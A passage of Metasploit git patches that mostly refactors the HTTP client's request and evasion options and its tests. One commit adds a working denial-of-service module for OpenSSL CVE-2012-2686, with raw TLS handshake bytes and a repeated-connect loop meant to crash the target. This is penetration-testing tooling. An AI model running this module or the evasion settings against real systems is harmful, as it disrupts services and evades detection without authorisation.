b/lib/rex/proto/http/client.rb index 8bb69f2735..2912065309 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'rex/proto/http/client_request' + module Rex module Proto module Http @@ -21,7 +23,7 @@ module Http ### class Client - DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -35,85 +37,14 @@ class Client self.proxies = proxies self.username = username self.password = password + self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, 'version' => '1.1', 'agent' => DefaultUserAgent, - # - # Evasion options - # - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all - 'uri_encode_count' => 1, # integer - 'uri_full_url' => false, # bool - 'pad_method_uri_count' => 1, # integer - 'pad_uri_version_count' => 1, # integer - 'pad_method_uri_type' => 'space', # space, tab, apache - 'pad_uri_version_type' => 'space', # space, tab, apache - 'method_random_valid' => false, # bool - 'method_random_invalid' => false, # bool - 'method_random_case' => false, # bool - 'version_random_valid' => false, # bool - 'version_random_invalid' => false, # bool - 'version_random_case' => false, # bool - 'uri_dir_self_reference' => false, # bool - 'uri_dir_fake_relative' => false, # bool - 'uri_use_backslashes' => false, # bool - 'pad_fake_headers' => false, # bool - 'pad_fake_headers_count' => 16, # integer - 'pad_get_params' => false, # bool - 'pad_get_params_count' => 8, # integer - 'pad_post_params' => false, # bool - 'pad_post_params_count' => 8, # integer - 'uri_fake_end' => false, # bool - 'uri_fake_params_start' => false, # bool - 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true - } + }.merge(Http::ClientRequest::DefaultConfig) - # This is not used right now... - self.config_types = { - 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], - 'uri_encode_count' => 'integer', - 'uri_full_url' => 'bool', - 'pad_method_uri_count' => 'integer', - 'pad_uri_version_count' => 'integer', - 'pad_method_uri_type' => ['space', 'tab', 'apache'], - 'pad_uri_version_type' => ['space', 'tab', 'apache'], - 'method_random_valid' => 'bool', - 'method_random_invalid' => 'bool', - 'method_random_case' => 'bool', - 'version_random_valid' => 'bool', - 'version_random_invalid' => 'bool', - 'version_random_case' => 'bool', - 'uri_dir_self_reference' => 'bool', - 'uri_dir_fake_relative' => 'bool', - 'uri_use_backslashes' => 'bool', - 'pad_fake_headers' => 'bool', - 'pad_fake_headers_count' => 'integer', - 'pad_get_params' => 'bool', - 'pad_get_params_count' => 'integer', - 'pad_post_params' => 'bool', - 'pad_post_params_count' => 'integer', - 'uri_fake_end' => 'bool', - 'uri_fake_params_start' => 'bool', - 'header_folding' => 'bool', - 'chunked_size' => 'integer' - } end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3f6ac6b760..68c3aa5f48 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -1,7 +1,10 @@ # -*- coding: binary -*- require 'uri' -require 'rex/proto/http' +#require 'rex/proto/http' +require 'rex/socket' +require 'rex/text' +require 'pp' module Rex module Proto @@ -9,6 +12,55 @@ module Http class ClientRequest + DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultConfig = { + # + # Evasion options + # + 'encode_params' => true, + 'encode' => true, + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_count' => 1, # integer + 'uri_full_url' => false, # bool + 'pad_method_uri_count' => 1, # integer + 'pad_uri_version_count' => 1, # integer + 'pad_method_uri_type' => 'space', # space, tab, apache + 'pad_uri_version_type' => 'space', # space, tab, apache + 'method_random_valid' => false, # bool + 'method_random_invalid' => false, # bool + 'method_random_case' => false, # bool + 'version_random_valid' => false, # bool + 'version_random_invalid' => false, # bool + 'version_random_case' => false, # bool + 'uri_dir_self_reference' => false, # bool + 'uri_dir_fake_relative' => false, # bool + 'uri_use_backslashes' => false, # bool + 'pad_fake_headers' => false, # bool + 'pad_fake_headers_count' => 16, # integer + 'pad_get_params' => false, # bool + 'pad_get_params_count' => 8, # integer + 'pad_post_params' => false, # bool + 'pad_post_params_count' => 8, # integer + 'uri_fake_end' => false, # bool + 'uri_fake_params_start' => false, # bool + 'header_folding' => false, # bool + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true + } + attr_accessor :authorization attr_accessor :cgi attr_accessor :config @@ -16,8 +68,6 @@ class ClientRequest attr_accessor :content_type attr_accessor :cookie attr_accessor :data - attr_accessor :encode - attr_accessor :encode_params attr_accessor :headers attr_accessor :host attr_accessor :method @@ -37,13 +87,11 @@ class ClientRequest def initialize(opts={}) @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = opts['client_config'] || {} + @config = DefaultConfig.merge(opts['client_config'] || {}) @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @data = opts['data'] || "" - @encode = opts['encode'] - @encode_params = opts['encode_params'] @headers = opts['headers'] || {} @host = opts['vhost'] @method = opts['method'] || "GET" @@ -51,28 +99,26 @@ class ClientRequest @port = opts['port'] || 80 @protocol = opts['proto'] || "HTTP" @query = opts['query'] || "" - @ssl = opts['ssl'] || false + @ssl = opts['ssl'] @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] || {} @vars_post = opts['vars_post'] || {} - @version = opts['version'] + @version = opts['version'] || "1.1" @opts = opts - config['chunked_size'] ||= 0 - config['pad_method_uri_count'] ||= 1 end def to_s - # Start GET query string - qstr = query + # Start GET query string + qstr = query.dup # Start POST data string pstr = data - if cgi == true + if cgi uri_str= set_cgi if (config['pad_get_params']) @@ -86,9 +132,9 @@ class ClientRequest vars_get.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (encode_params ? set_encode_uri(var) : var) + qstr << (config['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (encode_params ? set_encode_uri(val) : val) + qstr << (config['encode_params'] ? set_encode_uri(val) : val) end if (config['pad_post_params']) @@ -96,21 +142,21 @@ class ClientRequest rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end vars_post.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(var) : var) + pstr << (config['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (encode_params ? set_encode_uri(val) : val) + pstr << (config['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if encode + if config['encode'] qstr = set_encode_uri(qstr) end end @@ -120,7 +166,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if encode + if config['encode'] req << set_encode_uri(uri_str) else req << uri_str diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9db91c0d8e..e9a46035ff 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -158,7 +158,7 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) - + if str.respond_to?(:encode) # Skip over any bytes that fail to convert to UTF-8 return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) @@ -550,7 +550,7 @@ module Text when 'u-half' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms-half'), '%u', 2) } else - raise TypeError, 'invalid mode' + raise TypeError, "invalid mode #{mode.inspect}" end end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 14d28e8001..154a1a9485 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -7,10 +7,8 @@ shared_context "with 'uri_dir_self_reference'" do client_request.config['uri_dir_self_reference'] = true end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" end end @@ -21,10 +19,8 @@ shared_context "with no evasions" do client_request.config['uri_full_url'] = false end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" end end @@ -166,17 +162,65 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'cgi' => true, - 'vars_get' => { - 'foo[]' => 'bar', - } + 'client_config' => { + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, + }, + 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + # default + let(:encode_mode) { 'hex-normal' } - it "should contain the params" do - client_request.to_s.should include("foo[]=bar") + let(:vars_get) do + { + 'foo[]' => 'bar', + 'bar' => 'baz', + 'frobnicate' => 'the froozle?', + } end + + context "without 'encode_params'" do + let(:encode_params) { false } + it "should contain the unaltered params" do + str = client_request.to_s + str.should include("foo[]=bar") + str.should include("bar=baz") + str.should include("frobnicate=the froozle?") + end + end + + context "with 'encode_params'" do + let(:encode_params) { true } + context "with 'uri_encode_mode' = default (hex-normal)" do + it "should encode special chars" do + str = client_request.to_s + str.should include("foo%5b%5d=bar") + str.should include("bar=baz") + str.should include("frobnicate=the%20froozle%3f") + end + end + + context "with 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + end + end + + describe "#to_s" do + it "should produce same values if called multiple times with same options" do + client_request.to_s.should == client_request.to_s + end + end + + end + end describe "#set_uri" do From 7a7dd8975f4125dda67d7499cc12f47f71691e10 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 18:16:44 -0600 Subject: [PATCH 42/87] Hmm, turns out something actually used that Despite comments to the contrary --- lib/rex/proto/http/client.rb | 30 ++++++++++++++++++++++++++++ lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 31 insertions(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 2912065309..f3073ca530 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -45,6 +45,36 @@ class Client 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) + self.config_types = { + 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], + 'uri_encode_count' => 'integer', + 'uri_full_url' => 'bool', + 'pad_method_uri_count' => 'integer', + 'pad_uri_version_count' => 'integer', + 'pad_method_uri_type' => ['space', 'tab', 'apache'], + 'pad_uri_version_type' => ['space', 'tab', 'apache'], + 'method_random_valid' => 'bool', + 'method_random_invalid' => 'bool', + 'method_random_case' => 'bool', + 'version_random_valid' => 'bool', + 'version_random_invalid' => 'bool', + 'version_random_case' => 'bool', + 'uri_dir_self_reference' => 'bool', + 'uri_dir_fake_relative' => 'bool', + 'uri_use_backslashes' => 'bool', + 'pad_fake_headers' => 'bool', + 'pad_fake_headers_count' => 'integer', + 'pad_get_params' => 'bool', + 'pad_get_params_count' => 'integer', + 'pad_post_params' => 'bool', + 'pad_post_params_count' => 'integer', + 'uri_fake_end' => 'bool', + 'uri_fake_params_start' => 'bool', + 'header_folding' => 'bool', + 'chunked_size' => 'integer' + } + + end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 68c3aa5f48..1b55784e99 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -116,7 +116,7 @@ class ClientRequest qstr = query.dup # Start POST data string - pstr = data + pstr = data.dup if cgi uri_str= set_cgi From 724b32af1744d891b5fa629d460162b0942ba3b6 Mon Sep 17 00:00:00 2001 From: Gerry Eisenhaur Date: Tue, 26 Feb 2013 16:55:26 -0800 Subject: [PATCH 43/87] Fixed the importing of NBE files --- lib/msf/core/db.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 7e0bc736ba..9b5c8d8212 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -5163,11 +5163,11 @@ class DBManager # There is no place the NBE actually stores the plugin name used to # scan. You get "Security Note" or "Security Warning," and that's it. def import_nessus_nbe(args={}, &block) - data = args[:data] + nbe_data = args[:data] wspace = args[:wspace] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] - nbe_copy = data.dup + nbe_copy = nbe_data.dup # First pass, just to build the address map. addr_map = {} @@ -5183,7 +5183,7 @@ class DBManager addr_map[hname] = addr end - data.each_line do |line| + nbe_data.each_line do |line| r = line.split('|') next if r[0] != 'results' hname = r[2] From e7015985e7234fb6bdde3d2b0a41ed6cfacf1107 Mon Sep 17 00:00:00 2001 From: Wolfgang Ettlinger Date: Wed, 27 Feb 2013 22:57:53 +0100 Subject: [PATCH 44/87] Added CVE-2012-2686 Added Module for a DoS issue in OpenSSL (pre 1.0.1d). Can be exploited with services that use TLS >= 1.1 and AES-NI. Because of improper length computation, an integer underflow occurs leading to a segmentation fault. This module brute-forces serveral encrypted messages - when the decrypted message coincidentally specifies a certain value for the size, the integer underflow occurs. Though this could be accomplished more effectively (e.g. implementing or maninpulating and TLS implementation), this module still does what it should do. --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 169 +++++++++++++++++++++ 1 file changed, 169 insertions(+) create mode 100644 modules/auxiliary/dos/ssl/openssl_aesni.rb diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb new file mode 100644 index 0000000000..d05134f4de --- /dev/null +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -0,0 +1,169 @@ +# auxilary/dos/ssl/openssl_aesni +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS', + 'Description' => %q{ + The AES-NI implementation of OpenSSL 1.0.1c does not + properly compute the length of an encrypte message when used + with a TLS version 1.1 or above. This leads to an integer + underflow which can cause a DoS. + }, + 'Author' => [ + 'Wolfgang Ettlinger ' + ], + 'License' => BSD_LICENSE, + 'References' => + [ + [ 'CVE', '2012-2686'], + [ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt'] + ], + 'DisclosureDate' => 'Feb 05 2013')) + + register_options( + [ + Opt::RPORT(443), + OptInt.new('MAX_TRIES', [false, "Maximum number of tries", 300]) + ], self.class) + end + + def run + # Client Hello + p1 = + "\x16\x03\x01\x00\x7e\x01\x00\x00\x7a\x03\x02\x50\xeb\xf2\x4a\xaf"<< + "\x74\xf5\xe3\x55\x6a\xae\xcf\x88\x36\x7c\xd9\xe5\x1b\xcc\x09\xee"<< + "\x6f\x42\x30\x3b\x49\x55\xf8\xaa\x11\x32\xeb\x00\x00\x08\xc0\x13"<< + "\x00\x39\x00\x35\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00"<< + "\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b"<< + "\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06"<< + "\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01"<< + "\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f"<< + "\x00\x01\x01" + + # Client Key Exchange, Change Cipher Spec, Encrypted Handshake + # AES256-SHA + p2_aes_sha = + "\x16\x03\x02\x01\x06\x10\x00\x01\x02\x01\x00\x4c\xee\x18\xe2\xec"<< + "\xa9\x9d\xd7\x10\xd0\xff\x6f\xa8\x10\xf5\x9c\xa0\x91\x38\x93\x93"<< + "\xaa\x71\x07\x69\xb6\x22\x81\x2d\xcd\xe0\x8f\x95\xf2\x9b\xaa\x49"<< + "\x18\x15\x53\xc3\x34\x15\x81\xab\x20\x72\x16\x5b\xf2\xca\x13\x9e"<< + "\x11\x6e\x3c\xf5\x71\x7c\x19\xf4\x7d\x35\x71\x25\x6e\xbe\xee\xdf"<< + "\x1d\x55\xc9\x38\xac\xbb\x88\xab\xd0\x18\x7d\x5f\xaa\x3c\x91\x2f"<< + "\xd2\x64\x7c\x15\x91\xa6\xe7\xb7\x0c\x01\xb3\xc7\x37\xc1\x3a\xb2"<< + "\xde\x59\x6e\x8f\x7a\xde\x22\x59\x6c\xb7\x91\x21\x8f\xff\x56\x2c"<< + "\x5f\xfb\x54\x7f\xd1\x1a\x00\x0e\x02\xb2\x4e\x62\xfd\xe2\xc0\x8f"<< + "\x56\x52\x8a\x4c\x44\x01\x5f\x21\xf9\xd5\xb3\xeb\xab\x39\xcf\x4e"<< + "\xed\x78\xad\xea\xc7\x43\x80\x3f\xf2\x41\xbe\x5c\x83\xa5\x54\x6f"<< + "\x3c\xfb\x15\xed\x3c\x83\xf0\x3b\xd2\x7c\x5d\xf6\x82\xcb\x82\xb6"<< + "\x6a\x8e\x94\xf9\x22\x5a\x17\x20\x82\x21\x4e\x83\x01\x81\x06\x9e"<< + "\x21\xba\x16\xa4\xda\xcd\x8e\x1c\x8c\xe7\x19\x96\x2a\xec\x90\x6a"<< + "\x16\xac\x12\x68\xbd\xf7\x4b\x6c\x3c\x91\x8b\xe7\x34\x03\x91\x65"<< + "\x61\x57\xbc\x3a\x66\x3b\x7b\xb1\x57\xcd\x19\x5c\x4a\x69\x43\xb2"<< + "\x67\xaf\x38\x5c\x1a\x7e\x80\x78\x90\x25\xb8\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\x7d\xf4\x2c\x8c\x64\x74\xa5\x98\x02\x41"<< + "\xac\x97\xfd\x53\x15\x4c\xbf\x16\x08\x26\xe0\x6c\x22\x70\x5f\x36"<< + "\x75\x75\x96\xf9\x6b\x9f\xb4\xc3\x38\xa7\x14\xac\x21\x89\xec\xd6"<< + "\x37\x28\xf3\x0d\xdf\xb3\x1b\xac\x96\xf3\x16\x5c\xc3\x6b\x71\x1c"<< + "\xdb\x0d\x04\x96\x21\xd2" + + # DHE-RSA-AES256-SHA + p2_dhe_rsa_aes256_sha = + "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x00\x40\x43\xaf\x48\x16\x8d"<< + "\x17\xb9\xb0\xb6\xbc\x68\xab\x99\xf9\x30\xc9\xb1\xa2\x3b\x4f\x79"<< + "\xaa\x76\x5c\x0d\x61\xa0\x19\x55\x11\x20\xe8\xbb\xab\x69\xf3\xeb"<< + "\xff\x81\x1d\x16\x0d\x03\xaf\xb9\x70\xae\x72\x5c\xd8\xc7\x28\x2c"<< + "\xac\xd5\x84\x2c\xaf\x2a\x57\x46\x71\xca\x73\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\xff\x62\x0f\x7a\xb2\x79\xfe\x78\xce\xb9"<< + "\xde\xc4\xef\x66\x2f\xed\x1a\x37\xfe\x47\xdd\xde\x9c\xe0\x42\xbc"<< + "\x93\x20\x65\x05\xd3\x50\x14\x1c\x6c\xb1\x7a\x3a\x7d\x91\x92\xbb"<< + "\x9d\x42\x78\xbf\xe4\x08\xa0\xfd\x9c\xeb\x24\x29\x3b\xed\xc8\x54"<< + "\x3d\xd3\xa2\xff\xb0\x8b" + + # ECDHE-RSA-AES128-SHA + p2_ecdhe_rsa_aes128_sha = + "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x41\x04\x2f\x22\xf4\x06\x3f"<< + "\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8\x03\xe5\xaa\x36\xeb\x0f"<< + "\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69\x5b\x38\x95\x58\xb6\x0d"<< + "\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6\xb2\xe6\x8b\x2a\xd9\x03"<< + "\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73\x40\x14\x03\x02\x00\x01"<< + "\x01\x16\x03\x02\x00\x40\x8c\xc6\x4d\xdc\x42\x03\x64\xa3\xc0\xf4"<< + "\x94\xda\xa4\x12\x68\x78\xfd\x5b\x44\xaf\xa3\x91\x63\x75\x26\x93"<< + "\x14\xad\x86\xa7\x4f\x5a\x2e\xcb\x13\x17\xb7\xdf\x67\x64\x1b\x10"<< + "\xc3\x9f\x68\xaf\x92\x38\xbf\x67\xc6\x18\x5b\x78\xc9\x99\xc3\x70"<< + "\x89\x09\xe2\x3f\x3e\x1f" + + maxtries = datastore['MAX_TRIES'] + + success = false + + for i in 0..maxtries + print_status("Try \##{i}") + + connect + + sock.put(p1) + resp = sock.recv(4096) + + cs = get_cipher_suite(resp) + + if cs == 0xc013 # ECDHE-RSA-AES128-SHA + p2 = p2_ecdhe_rsa_aes128_sha + elsif cs == 0x0039 # DHE-RSA-AES256-SHA + p2 = p2_dhe_rsa_aes256_sha + elsif cs == 0x0035 # AES256-SHA + p2 = p2_aes_sha + else + print_error("No common ciphers!") + return + end + + sock.put(p2) + + alert = nil + + timeout(2) do + alert = sock.recv(4096) + end + + disconnect + + if alert == '' + print_status("DoS successful. process on #{rhost} did not respond.") + success = true + break + end + end + + if success == false + print_status("DoS unsuccessful.") + end + end + + def get_cipher_suite(resp) + offset = 0 + + while offset < resp.length + type = (resp[offset, 1]).unpack("C")[0] + + if not type == 22 # Handshake + return nil + end + + len = (resp[offset+3, 2]).unpack("n")[0] + hstype = (resp[offset+5, 1]).unpack("C")[0] + + if hstype == 2 + return (resp[offset+44, 2]).unpack("n")[0] + end + + offset += len + end + + end +end + From d5ae54cbb64b3e1db831d07f9840226dd27a228e Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:27:37 -0600 Subject: [PATCH 45/87] More accurate docs --- lib/rex/proto/http/client.rb | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index f3073ca530..5402b3ba3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -254,6 +254,7 @@ class Client # If the request is a 401, and we have creds, it will attempt to complete # authentication and return the final response # + # @return (see #_send_recv) def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] @@ -271,7 +272,7 @@ class Client # Call this directly instead of {#send_recv} if you don't want automatic # authentication handling. # - # @return [Response] + # @return (see #read_response) def _send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) @@ -286,6 +287,7 @@ class Client # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # + # @return [void] def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -299,6 +301,7 @@ class Client # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) if opts['username'].nil? or opts['username'] == '' @@ -352,15 +355,19 @@ class Client return res end - # Converts username and password into the HTTP Basic - # authorization string. + # Converts username and password into the HTTP Basic authorization + # string. + # + # @return [String] A value suitable for use as an Authorization header def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end # Send a series of requests to complete Digest Authentication + # # @param opts [Hash] the options used to build an HTTP request + # # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 @@ -495,14 +502,14 @@ class Client end end - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) # # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # + # @option opts (see #send_request_cgi) + # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use + # + # @return [Response] the last valid HTTP response we received def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -608,6 +615,7 @@ class Client # # Read a response from the server # + # @return [Response] def read_response(t = -1, opts = {}) resp = Response.new From 5606db3f9ca93da80aebe24c0a5139f32c9cb951 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:28:17 -0600 Subject: [PATCH 46/87] Re-enable some commented tests --- spec/lib/rex/proto/http/client_spec.rb | 29 +++++++++++++++----------- 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d216c75325..8dc10b8c46 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -43,8 +43,8 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash end @@ -53,7 +53,11 @@ describe Rex::Proto::Http::Client do end it "should produce a CGI HTTP request" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest + req = cli.request_cgi + req.should be_a_kind_of Rex::Proto::Http::ClientRequest + + req.port.should == 80 + req.ssl.should be_false end it "should attempt to connect to a server" do @@ -78,15 +82,16 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds - # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - # this_cli.should have_creds - pending "Should actually respond to :has_creds" + pending "Should actually respond to :has_creds" do + cli.should_not have_creds + this_cli = described_class.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end end it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header", :pending => "Waiting for #1500" do + it "should produce a basic authentication header" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -114,10 +119,10 @@ describe Rex::Proto::Http::Client do end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + cli.should_not be_pipelining this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true - this_cli.pipelining?.should be_true + this_cli.should be_pipelining end it "should respond to its various accessors" do @@ -129,8 +134,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password + cli.should respond_to :username + cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 4edd46216f32d4c0009aadf8204b8bb4fcc8af89 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:29:26 -0600 Subject: [PATCH 47/87] Refactor config -> opts Puts all the evasion stuff in the same place as regular HTTP options to make it easier to deal with. --- lib/rex/proto/http/client.rb | 3 - lib/rex/proto/http/client_request.rb | 201 ++++++++---------- .../lib/rex/proto/http/client_request_spec.rb | 32 ++- spec/lib/rex/proto/http/client_spec.rb | 2 - 4 files changed, 103 insertions(+), 135 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 5402b3ba3e..b10af20c3c 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,7 +23,6 @@ module Http ### class Client - DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance @@ -41,8 +40,6 @@ class Client self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - 'version' => '1.1', - 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) self.config_types = { diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 1b55784e99..31933fe5f7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -14,6 +14,25 @@ class ClientRequest DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" DefaultConfig = { + # + # Regular HTTP stuff + # + 'agent' => DefaultUserAgent, + 'cgi' => true, + 'cookie' => nil, + 'data' => '', + 'headers' => {}, + 'raw_headers' => '', + 'method' => 'GET', + 'path_info' => '', + 'port' => 80, + 'proto' => 'HTTP', + 'ssl' => false, + 'uri' => '/', + 'vars_get' => {}, + 'vars_post' => {}, + 